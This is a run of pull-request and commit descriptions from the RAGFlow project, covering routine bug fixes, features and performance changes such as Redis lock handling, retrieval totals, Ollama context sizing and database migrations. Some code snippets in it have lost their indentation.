stream = BytesIO(fh.read())
self._stream_opened = True
```
> https://github.com/py-pdf/pypdf/blob/main/pypdf/_reader.py#L156
so I moved the `self.pdf.close` function call and fixed this problem
hoping to help the project😊
ragflow: v0.17 also encountered this problem. #1453 The task table shows
that the actual task has been completed. Since the process_msg of the
task is not synchronized to the document table, there is no progress
update on the page.
This may be caused by the lock not being released when the exception
occurs.
ragflow:v0.17同样碰到这个问题, 看task表实际任务已经完成,由于没有把task的process_msg同步给document表,
所以在页面看没有进度更新。
可能是这里异常时没有释放锁导致的。
```/api/ragflow_server.py
def update_progress():
lock_value = str(uuid.uuid4())
redis_lock = RedisDistributedLock("update_progress", lock_value=lock_value, timeout=60)
logging.info(f"update_progress lock_value: {lock_value}")
while not stop_event.is_set():
try:
if redis_lock.acquire():
DocumentService.update_progress()
redis_lock.release()
stop_event.wait(6)
except Exception:
logging.exception("update_progress exception")
++ if redis_lock.acquired:
++ redis_lock.release()
```
### What problem does this PR solve?
Fix KB update_time changed whenever system relaunched. #6953
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Sometimes, the **s** in **chunks (s, a)** is an empty string. This
causes the condition **if s and len(a) > 0** in the line **chunks = [(s,
a) for s, a in chunks if s and len(a) > 0]** to fail, which changes the
length of the new chunks. As a result, the final assertion **assert
len(chunks) - end == n_clusters, "{} vs. {}".format(len(chunks) - end,
n_clusters)** fails and raises a confusing error like 7 vs. 8
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
Fix: In the dark night theme, the message input box is not displayed
correctly. #6950
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### Related Issue:
https://github.com/infiniflow/ragflow/issues/6741
### Environment:
Using nightly version
Commit version:
[[6051abb](6051abb4a3)]
### Bug Description:
The retrieval function in rag/nlp/search.py returns the original total
chunks number
even after chunks are filtered by similarity_threshold. This creates
inconsistency
between the actual returned chunks and the reported total.
### Changes Made:
Added code to count how many search results actually meet or exceed the
configured similarity threshold
Positioned the calculation after the doc_ids conditional logic to ensure
special cases are handled correctly
Updated the ranks["total"] value to store this filtered count instead of
using the raw search result count
Using NumPy leverages optimized C-level batch operations to optimize
speed
### What problem does this PR solve?
Feat: Add translation text to the prompt word of the generate operator
to distinguish it from the prompt word of the knowledge base #6934
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
- Returning 3 similarity scores to the chat completion's `reference`
field. It gives the user more transparency and added flexibility to
display/rerank the reference when needed
Co-authored-by: Yingfeng <yingfeng.zhang@gmail.com>
### What problem does this PR solve?
Fix: remove deprecated KB updating `permission` field. #6911
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: local variable referenced before assignment. #6803
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
The old logic filters out all assistant messages from messages, which,
in multi-turn conversations, results in only user messages being
retained. This leads to an error in locally deployed models:
Conversation roles must alternate user/assistant/user/assistant/...
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
Feat: Install sonner library #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix the issue where waiting tasks couldn't be processed when upstream
components were "switch", "categorize", or "relevant" and the normal
processing path couldn't continue.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
This PR introduces **primitive support for function calls**,
enabling the system to handle basic function call capabilities.
However, this feature is currently experimental and **not yet enabled
for general use**, as it is only supported by a subset of models,
namely, Qwen and OpenAI models.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fixes#6548
Add exception handling to prevent exceptions from propagating back to
the web, which may lead to failure in displaying conversation content.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
Co-authored-by: cm <caiming@sict.ac.cn>
[When parsing documents with graph, an error
occurred:[ERROR][Exception]: 'method']
(https://github.com/infiniflow/ragflow/issues/6835)
### What problem does this PR solve?
Close#6786
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
Co-authored-by: cm <caiming@sict.ac.cn>
### What problem does this PR solve?
This PR addresses the build and dependency issues faced by developers in
regions with poor connectivity to official Ubuntu repositories and
standard dependency sources. Currently, developers in these regions
experience slow or failed Docker builds and dependency downloads,
significantly impacting development efficiency.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
The changes include:
1. Modified Dockerfile to use alternative Ubuntu mirrors with better
connectivity in affected regions
2. Added a new script (download_deps_CN.py) that provides
region-specific alternative download links for dependencies
### What problem does this PR solve?
#6731#6722
_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._
### Type of change
- [ ] Documentation Update
---------
Co-authored-by: Zhichang Yu <yuzhichang@gmail.com>
### What problem does this PR solve?
Feat: Load the dialog page, prohibit calling the dialog/get interface
#6798
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
fix redis pvc in helm deployment
### What problem does this PR solve?
_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
add openai agent
_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._
### Type of change
- [ ] Bug Fix (non-breaking change which fixes an issue)
- [x] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
---------
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
### What problem does this PR solve?
Feat: Clarify the use of OpenAI-API-compatible #6782
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
…gic to return the correct deletion message. Add handling for empty
arrays to ensure no errors occur during the deletion operation. Update
the test cases to verify the new logic.
### What problem does this PR solve?
fix this bug:https://github.com/infiniflow/ragflow/issues/6607
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
---------
Co-authored-by: wenju.li <wenju.li@deepctr.cn>
### What problem does this PR solve?
align default values in create chat assistant HTTP API dos with
implementation.
llm.presence_penalty 0.2 -> 0.4
prompt.top_n 8->6
### Type of change
- [x] Documentation Update
### What problem does this PR solve?
Fix: Issue with Markdown Code Blocks Breaking Frontend Layout #5789
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
…cument_ids" to maintain consistency.
### What problem does this PR solve?
Close#6752
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
Co-authored-by: wenju.li <wenju.li@deepctr.cn>
### What problem does this PR solve?
Fix: The file upload prompt indicates "No authorization." #6516
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: Using the Enter key does not send a complete message #6754
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Support deleting knowledge graph #6747
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Add a notification logic to the team member invite feature #6610
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Interrupt streaming #6515
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
fix#6085
RagTokenizer's dfs_() function falls into infinite recursion when
processing text with repetitive Chinese characters (e.g.,
"一一一一一十一十一十一..." or "一一一一一一十十十十十十十二十二十二..."), causing memory leaks.
### Type of change
Implemented three optimizations to the dfs_() function:
1.Added memoization with _memo dictionary to cache computed results
2.Added recursion depth limiting with _depth parameter (max 10 levels)
3.Implemented special handling for repetitive character sequences
- [x] Bug Fix (non-breaking change which fixes an issue)
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
I'm really sorry, I found that in graphrag/general/extractor.py under
def __call__, the line change.removed_nodes.extend(nodes[1:]) causes an
AttributeError: 'set' object has no attribute 'extend'. Could you please
merge the branch e666528 again? I made some modifications.
### What problem does this PR solve?
Feat: Allows users to search for models in the model selection drop-down
box #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### Related Issue:
https://github.com/infiniflow/ragflow/issues/6653
### Environment:
Using nightly version [ece5903]
Elasticsearch database
Thanks for the review! My fault! I realize my initial testing wasn't
passed.
In graphrag/entity_resolution.py
`sub_connect_graph` is a set like` {'HELLO', 'Hi', 'How are you'}`,
Neither accessing `.nodes` nor `.nodes()` will work, **it still causes
`AttributeError: 'set' object has no attribute 'nodes'`**
In graphrag/general/extractor.py
The `list.extend() `method performs an in-place operation, directly
modifying the original list and returning ‘None’ rather than the
modified list.
Neither accessing
`sorted(set(node0_attrs[attr].extend(node1_attrs.get(attr, []))))` nor
`sorted(set(node0_attrs[attr].extend(node1_attrs[attr])))` will work,
**it still causes `TypeError: 'NoneType' object is not iterable`**
### Type of change
- [ ] Bug Fix AttributeError: graphrag/entity_resolution.py
- [ ] Bug Fix TypeError: graphrag/general/extractor.py
### Related Issue: #6653
### Environment:
Using nightly version
Elasticsearch database
### Bug Description:
When clicking the "Entity Resolution" button in KnowledgeGraph,
encountered the following errors:
graphrag/entity_resolution.py
```
list(sub_connect_graph.nodes) AttributeError
```
graphrag/general/extractor.py
```
node0_attrs[attr] = sorted(set(node0_attrs[attr].extend(node1_attrs[attr])))
TypeError: 'NoneType' object is not iterable
```
```
for attr in ["keywords", "source_id"]:
KeyError I think attribute "keywords" is in edges not nodes
```
graphrag/utils.py
```
settings.docStoreConn.delete() # Sync function called as async
```
### Changes Made:
Fixed AttributeError in entity_resolution.py by properly handling graph
nodes
Fixed TypeError and KeyError in extractor.py by separate operations
Corrected async/sync mismatch in document deletion call
### What problem does this PR solve?
- Added support for S3-compatible protocols.
- Enabled the use of knowledge base ID as a file prefix when storing
files in S3.
- Updated docker/README.md to include detailed S3 and OSS configuration
instructions.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
https://github.com/infiniflow/ragflow/issues/6138
This PR is going to support vision llm for gpustack, modify url path
from `/v1-openai` to `/v1`
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
### Type of change
- [x] Documentation Update
---------
Co-authored-by: balibabu <cike8899@users.noreply.github.com>
### What problem does this PR solve?
Fix#6334
Hello, I encountered the same problem in #6334. In the
`api/db/db_models.py`, it calls `obj.create_table()` unconditionally in
`init_database_tables`, before the `migrate_db()`. Specially for the
`permission` field of `user_canvas` table, it has `index=True`, which
causes `peewee` to issue a SQL trying to create the index when the field
does not exist (the `user_canvas` table already exists), so
`psycopg2.errors.UndefinedColumn: column "permission" does not exist`
occurred.
I've added a judgement in the code, to only call `create_table()` when
the table does not exist, delegate the migration process to
`migrate_db()`.
Then another problem occurs: the `migrate_db()` actually does nothing
because it failed on the first migration! The `playhouse` blindly issue
DDLs without things like `IF NOT EXISTS`, so it fails... even if the
exception is `pass`, the transaction is still rolled back. So I removed
the transaction in `migrate_db()` to make it work.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
Actually fix#6241
Hello, I ran into the same problem as #6241. When I'm testing my agent
flow in the web ui using `Run` button with a file input, the retrieval
component always gave an empty output.
In the code I found that:
`web/src/pages/flow/debug-content/index.tsx`:
```tsx
const onOk = useCallback(async () => {
const values = await form.validateFields();
const nextValues = Object.entries(values).map(([key, value]) => {
const item = parameters[Number(key)];
let nextValue = value;
if (Array.isArray(value)) {
nextValue = ``;
value.forEach((x) => {
nextValue +=
x?.originFileObj instanceof File
? `${x.name}\n${x.response?.data}\n----\n` // Here, the file content always ends in '\n'
: `${x.url}\n${x.result}\n----\n`;
});
}
return { ...item, value: nextValue };
});
ok(nextValues);
}, [form, ok, parameters]);
```
while in the `agent/component/retrieval.py`:
```python
def _run(self, history, **kwargs):
query = self.get_input()
query = str(query["content"][0]) if "content" in query else ""
lines = query.split('\n') # inputs are split to ['xxx','yyy','----','']
query = lines[-1] if lines else "" # Here we always get '', thus no result
kbs = KnowledgebaseService.get_by_ids(self._param.kb_ids)
if not kbs:
return Retrieval.be_output("")
```
so the code will never got correct result.
I'm not sure why the input needs such a split here, so I just removed
the splitting, and it works well on my side.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
Fix#5418
Actually, the fix#4329 also works for agent flows with parameters, so
this PR just relaxes the `else` branch of that. With this PR, it works
fine on my side, may need more testing to make sure this does not break
something.
I guess the real problem may be deeply hidden in the code which relates
to conversation and canvas execution. After a few hours of debugging, I
see the only difference between with and without parameters in `begin`
component, is the `history` field of canvas data. When the `begin`
component contains some parameters, the debug log shows:
```
025-03-29 19:50:38,521 DEBUG 356590 {
"component_name": "Begin",
"params": {"output_var_name": "output", "message_history_window_size": 22, "query": [{"type": "fileUrls", "key": "fileUrls", "name": "files", "optional": true, "value": "问题.txt\n今天天气怎么样"}], "inputs": [], "debug_inputs": [], "prologue": "你好! 我是你的助理,有什么可以帮到你的吗?", "output": null},
"output": null,
"inputs": []
}, history: [["user", "请回答我上传文件中的问题。"]], kwargs: {"stream": false}
2025-03-29 19:50:38,523 DEBUG 356590 {
"component_name": "Answer",
"params": {"output_var_name": "output", "message_history_window_size": 22, "query": [], "inputs": [], "debug_inputs": [], "post_answers": [], "output": null},
"output": null,
"inputs": []
}, history: [["user", "请回答我上传文件中的问题。"]], kwargs: {"stream": false}
```
Then it does not go further along the flow.
When the `begin` component does not contain any parameter, the debug log
shows:
```
2025-03-29 19:41:13,518 DEBUG 353596 {
"component_name": "Begin",
"params": {"output_var_name": "output", "message_history_window_size": 22, "query": [], "inputs": [], "debug_inputs": [], "prologue": "你好! 我是你的助理,有什么可以帮到你的吗?", "output": null},
"output": null,
"inputs": []
}, history: [], kwargs: {"stream": false}
2025-03-29 19:41:13,520 DEBUG 353596 {
"component_name": "Answer",
"params": {"output_var_name": "output", "message_history_window_size": 22, "query": [], "inputs": [], "debug_inputs": [], "post_answers": [], "output": null},
"output": null,
"inputs": []
}, history: [], kwargs: {"stream": false}
2025-03-29 19:41:13,556 INFO 353596 127.0.0.1 - - [29/Mar/2025 19:41:13] "POST /api/v1/agents/fee6886a0c6f11f09b48eb8798e9aa9b/sessions?user_id=123 HTTP/1.1" 200 -
2025-03-29 19:41:21,115 DEBUG 353596 Canvas.prepare2run: Retrieval:LateGuestsNotice
2025-03-29 19:41:21,116 DEBUG 353596 {
"component_name": "Retrieval",
"params": {"output_var_name": "output", "message_history_window_size": 22, "query": [], "inputs": [], "debug_inputs": [], "similarity_threshold": 0.2, "keywords_similarity_weight": 0.3, "top_n": 8, "top_k": 1024, "kb_ids": ["9aca3c700c5911f0811caf35658b9385"], "rerank_id": "", "empty_response": "", "tavily_api_key": "", "use_kg": false, "output": null},
"output": null,
"inputs": []
}, history: [["user", "请回答我上传文件中的问题。"]], kwargs: {"stream": false}
```
It correctly goes along the flow and generates correct answer.
You can see the difference: when the `begin` component has any
parameter, the `history` field is filled from the beginning, while it is
just `[]` if the `begin` component has no parameter.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
Fix knowledge_graph_kwd on infinity. Close#6476 and #6624
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix entity_types. Close#6287 and #6608
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
This PR gives better control over how we distribute which service will
be loaded. With this approach, we can create containers to run only the
web server and others to run the task executor. It also introduces the
unique ID per task executor host, this will be important when scaling
task executors horizontally, considering unique task executor ids will
be required.
This new `entrypoint.sh` maintains the default behavior of starting the
web server and task executor in the same host.
### Type of change
- [ ] Bug Fix (non-breaking change which fixes an issue)
- [X] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
# Dynamic Context Window Size for Ollama Chat
## Problem Statement
Previously, the Ollama chat implementation used a fixed context window
size of 32768 tokens. This caused two main issues:
1. Performance degradation due to unnecessarily large context windows
for small conversations
2. Potential business logic failures when using smaller fixed sizes
(e.g., 2048 tokens)
## Solution
Implemented a dynamic context window size calculation that:
1. Uses a base context size of 8192 tokens
2. Applies a 1.2x buffer ratio to the total token count
3. Adds multiples of 8192 tokens based on the buffered token count
4. Implements a smart context size update strategy
## Implementation Details
### Token Counting Logic
```python
def count_tokens(text):
"""Calculate token count for text"""
# Simple calculation: 1 token per ASCII character
# 2 tokens for non-ASCII characters (Chinese, Japanese, Korean, etc.)
total = 0
for char in text:
if ord(char) < 128: # ASCII characters
total += 1
else: # Non-ASCII characters
total += 2
return total
```
### Dynamic Context Calculation
```python
def _calculate_dynamic_ctx(self, history):
"""Calculate dynamic context window size"""
# Calculate total tokens for all messages
total_tokens = 0
for message in history:
content = message.get("content", "")
content_tokens = count_tokens(content)
role_tokens = 4 # Role marker token overhead
total_tokens += content_tokens + role_tokens
# Apply 1.2x buffer ratio
total_tokens_with_buffer = int(total_tokens * 1.2)
# Calculate context size in multiples of 8192
if total_tokens_with_buffer <= 8192:
ctx_size = 8192
else:
ctx_multiplier = (total_tokens_with_buffer // 8192) + 1
ctx_size = ctx_multiplier * 8192
return ctx_size
```
### Integration in Chat Method
```python
def chat(self, system, history, gen_conf):
if system:
history.insert(0, {"role": "system", "content": system})
if "max_tokens" in gen_conf:
del gen_conf["max_tokens"]
try:
# Calculate new context size
new_ctx_size = self._calculate_dynamic_ctx(history)
# Prepare options with context size
options = {
"num_ctx": new_ctx_size
}
# Add other generation options
if "temperature" in gen_conf:
options["temperature"] = gen_conf["temperature"]
if "max_tokens" in gen_conf:
options["num_predict"] = gen_conf["max_tokens"]
if "top_p" in gen_conf:
options["top_p"] = gen_conf["top_p"]
if "presence_penalty" in gen_conf:
options["presence_penalty"] = gen_conf["presence_penalty"]
if "frequency_penalty" in gen_conf:
options["frequency_penalty"] = gen_conf["frequency_penalty"]
# Make API call with dynamic context size
response = self.client.chat(
model=self.model_name,
messages=history,
options=options,
keep_alive=60
)
return response["message"]["content"].strip(), response.get("eval_count", 0) + response.get("prompt_eval_count", 0)
except Exception as e:
return "**ERROR**: " + str(e), 0
```
## Benefits
1. **Improved Performance**: Uses appropriate context windows based on
conversation length
2. **Better Resource Utilization**: Context window size scales with
content
3. **Maintained Compatibility**: Works with existing business logic
4. **Predictable Scaling**: Context growth in 8192-token increments
5. **Smart Updates**: Context size updates are optimized to reduce
unnecessary model reloads
## Future Considerations
1. Fine-tune buffer ratio based on usage patterns
2. Add monitoring for context window utilization
3. Consider language-specific token counting optimizations
4. Implement adaptive threshold based on conversation patterns
5. Add metrics for context size update frequency
---------
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
This PR updates the MySQL container configuration by setting the
parameter --binlog_expire_logs_seconds to 604800 seconds (7 days). This
change ensures that MySQL automatically purges binary logs older than 7
days, helping to conserve disk space and maintain precise log
management.
### What problem does this PR solve?
_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
Feat: Add RadioGroup component #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix: When Excel is a formula, the parsed result is a formula, but cannot
be correctly parsed as a value type
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
Co-authored-by: tangyu <1@1.com>
### What problem does this PR solve?
_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._
### Type of change
- [x] add test cases
### What problem does this PR solve?
Introduced delete_knowledge_graph
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [ ] Documentation Update
### What problem does this PR solve?
When I use the categorization operator, I find that if the keyword I
want to Categorize appears repeatedly in the input, then I cannot judge
the word that appears most frequently. Instead, I simply get the word
that matches and return all the ones that have made the following
changes to the categorize filter.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [x] New Feature (non-breaking change which adds functionality)
- [x] Refactoring
- [x] Performance Improvement
### What problem does this PR solve?
Feat: Add logo-with-text-white.svg #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Prevent applications from failing to start due to calling non-existent
or incorrect Minio connection configurations when using file storage
outside of Minio
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
related issue #5882
### What problem does this PR solve?
update helm infinity image version from v0.5.0
image to infiniflow/infinity:v0.6.0-dev3
to solve issue #5882
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
Fix:flow DB Assistant module translate to zh
### Type of change
- [ ] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [x] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
---------
Co-authored-by: Chenzy <chenzy901@gmail.com>
### What problem does this PR solve?
There is a small bug in the update dataset of this document. The return
type of rag_oobject.list_datasets is a list type, and the first item
should be taken as' ragflow_stdk.modules.dataset ' DataSet`, Adapt to
the update.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Removed set_entity and set_relation to avoid accessing doc engine during
graph computation.
Introduced GraphChange to avoid writing unchanged chunks.
### Type of change
- [x] Performance Improvement
### What problem does this PR solve?
1. for /mv API use get by ids to avoid O(n) DB IO
2. for /list remove one useless call
### Type of change
- [x] Performance Improvement
Added the with_retry decorator in db_models.py to add a retry mechanism
for database operations. Applied the retry mechanism to the lock and
unlock methods of the PostgresDatabaseLock and MysqlDatabaseLock classes
to enhance the reliability of lock operations.
### What problem does this PR solve?
resolve failed to acquire lock exception with retry mechanism
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
---------
Co-authored-by: wenju.li <wenju.li@deepctr.cn>
### What problem does this PR solve?
Fix: Resolve FlowSetting not reading Title from .ts files
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Enhance Langfuse API: add project_id and project_name
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
For now, if you use thinking model (deepseek-r1:32b with ollama server
in my case) in "Keyword" node, result contains all <think> block and so
node return not only keywords
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
improve the logic to fetch parent folder, remove the useless DB IO logic
### Type of change
- [x] Performance Improvement
### What problem does this PR solve?
_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._
### Type of change
- [x] update test cases
### What problem does this PR solve?
1. miss completion delimiter.
2. miss bracket process.
3. doc_ids return by update_graph is a set, and insert operation in
extract_community need a list.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
for batch requests based on get_by_ids to fetch all files first replace
the O(n) IO logic.
### Type of change
- [x] Performance Improvement
### What problem does this PR solve?
Feat: Add LangfuseCard component. #6155
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Langfuse update model has no fields attribute
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
---------
Co-authored-by: lizheng@ssc-hn.com <lizheng@ssc-hn.com>
### What problem does this PR solve?
Feat: Add background-core-standard to tailwind.css #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
support pic base bullet for PPT
modify one mistake in document
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
When using the online large model API knowledge base to extract
knowledge graphs, frequent Rate Limit Errors were triggered,
causing document parsing to fail. This commit fixes the issue by
optimizing API calls in the following way:
Added exponential backoff and jitter to the API call to reduce the
frequency of Rate Limit Errors.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
###Address Problem:
The original implementation used re.sub(r"(\\\"|\")", "", content) which
stripped all quotes from the processed content. While this worked for
simple Jinja2-rendered templates, it caused formatting issues when :
-Quotes were required in the final output (e.g., JSON, Python Code
strings)
###Solution:
1. Selective JSON Serialization.
2. Removed Global Quote Removal
### What problem does this PR solve?
This PR addresses an issue in template processing where all quotation
marks (" and \") were being removed from content, potentially corrupting
string formatting in rendered outputs. **In fact, extra quotes is
generated by json.dumps(v, ensure_ascii=False).**
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
This PR resolves the issue of multiple top-level packages being detected
in the Python project, which caused errors when using uv pip install.
The problem occurred because the project had multiple directories files
at the root level, leading to a flat-layout error.
To fix this, the pyproject.toml file was updated to explicitly list the
packages using the [tool.setuptools] section. This ensures that the
correct packages are included during installation, avoiding the
flat-layout error.
Type of change
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: If the Transfer item is disabled, the item cannot be edited. #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Adds hierarchical title path tracking for tables in DOCX documents to
improve context association. Previously, extracted tables lacked
positional context within document structure.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix the error where the Ollama embeddings interface returns a “500
Internal Server Error” when using models such as xiaobu-embedding-v2 for
embedding.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- Introduce the `check_duplicate_ids` function in `dataset.py` and
`doc.py` to check for and handle duplicate IDs.
- Update the deletion operation to ensure that when deleting datasets
and documents, error messages regarding duplicate IDs can be returned.
- Implement the `check_duplicate_ids` function in `api_utils.py` to
return unique IDs and error messages for duplicate IDs.
### What problem does this PR solve?
Close https://github.com/infiniflow/ragflow/issues/6234
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
---------
Co-authored-by: wenju.li <wenju.li@deepctr.cn>
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
### What problem does this PR solve?
Feat: Add user registration toggle feature. Added a user registration
toggle REGISTER_ENABLED in the settings and .env config file. The user
creation interface now checks the state of this toggle to control the
enabling and disabling of the user registration feature.
the front-end implementation is done, the registration button does not
appear if registration is not allowed. I did the actual tests on my
local server and it worked smoothly.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
---------
Co-authored-by: wenju.li <wenju.li@deepctr.cn>
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
Fix: Optimized the get_by_id method to resolve the issue of missing
exceptions and improve query performance
### What problem does this PR solve?
Optimized the get_by_id method to resolve the issue of missing
exceptions and improve query performance.
Optimization details:
1. The original method used a custom query method that required
concatenating SQL, which impacted performance.
2. The query method returned a list, which needed to be accessed by
index, posing a risk of index out-of-bounds errors.
3. The original method used except Exception to catch all errors, which
is not a best practice in Python programming and may lead to missing
exceptions. The get_or_none method accurately catches DoesNotExist
errors while allowing other errors to be raised normally.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [x] Performance Improvement
### What problem does this PR solve?
Call register_scripts on connecting redis
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### Change Content
- A new function `load_env_file` has been added to load environment
variables from a .env file in the current script directory.
- If the .env file exists, the variables within it will be loaded; if it
does not exist, a warning message will be output.
I found this issue while testing this pr:
https://github.com/infiniflow/ragflow/pull/6327. The locally started
server did not read the REGISTER_ENABLED variables in the .env. The
result has always been the default True
### What problem does this PR solve?
Follow the tutorial in the README.md to start from source code. base's
container that is es、redis,etc will load .env. Therefore,
`launch_backend_service.sh` should also load .env to be consistent with
the configuration of the docker container when it was started
### Type of change
- [ ] Bug Fix (non-breaking change which fixes an issue)
- [x] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
- Fix incorrect progress check condition that prevented re-parsing of
completed documents
- Allow parsing for documents with progress 0.0 (not started) or 1.0
(completed)
- Only block parsing for documents currently in progress (0.0 < progress
< 1.0)
Close#6312
---------
